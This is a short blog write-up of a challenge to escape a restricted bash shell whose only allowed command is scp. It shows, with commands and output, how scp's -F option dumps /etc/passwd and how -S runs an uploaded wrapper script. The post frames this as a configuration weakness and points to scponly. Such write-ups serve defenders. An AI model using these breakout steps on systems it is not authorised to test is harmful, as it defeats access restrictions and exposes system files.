Breaking out of rbash using scp

I was recently challenged to break out of a restricted shellenvironment in which the only accessible command was scp.

The Restricted Environment

The environment had a PATH set to /rbashbin which wasn’t writable.

untrusted@demobox ~ $ echo $PATH
/rbashbin

The only command in /rbashbin was scp.

The home directory of the “untrusted” user was owned by root, but was writable to allow file uploads. However, due to the restrictions on the PATH it was not possible to directly execute any files that were uploaded. Normal system commands too were inaccessible:

untrusted@demobox ~ $ id
-su: id: command not found

The .bash_profile and .bashrc files were owned by root and were not writable, so it wasn’t possible to overwrite these with ones containing malicious commands.

.bash_logout could be created and filled with commands, but these all ran under rbash, so failed.

After all the usual tricks had failed I resorted to reading the man page for scp (some another box since running “man” wasn’t allowed). I noticed two useful command line options:

Reading files with -F

     -F ssh_config
             Specifies an alternative per-user configuration file for ssh.  This option is directly passed to ssh(1).

This options can be used to “cat” certain types of file:

untrusted@demobox ~ $ scp -F /etc/passwd x y:
/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/bash
/etc/passwd: line 2: Bad configuration option: bin:x:1:1:bin:/bin:/bin/false
/etc/passwd: line 3: Bad configuration option: daemon:x:2:2:daemon:/sbin:/bin/false
...

Running commands with -S

     -S program
             Name of program to use for the encrypted connection.  The program must understand ssh(1) options.

Ah, a way to run other commands! However various command line options are passed to your command that you probably don’t want:

untrusted@demobox ~ $ scp -S /usr/bin/id x y:
/usr/bin/id: invalid option -- x
Try `/usr/bin/id --help' for more information.
lost connection

untrusted@demobox ~ $ scp -S /bin/echo x y:
-x -oForwardAgent no -oPermitLocalCommand no -oClearAllForwardings yes y scp -t .

On a box that you control make a simple wrapper script, then upload it:

$ cat /tmp/id.sh
#!/bin/sh
/usr/bin/id
$ chmod +x /tmp/id.sh
$ scp /tmp/id.sh untrusted@demobox:

Once the file is uploaded, run it with scp:

untrusted@demobox ~ $ scp -S /home/untrusted/id.sh x y:
uid=1008(untrusted) gid=1014(untrusted) groups=1014(untrusted)

This is not a vulnerability in rbash or in scp, it’s just that the two shouldn’t be used together in the environment above. scponly is probably a better solution.

Tags: , ,

Posted in Blog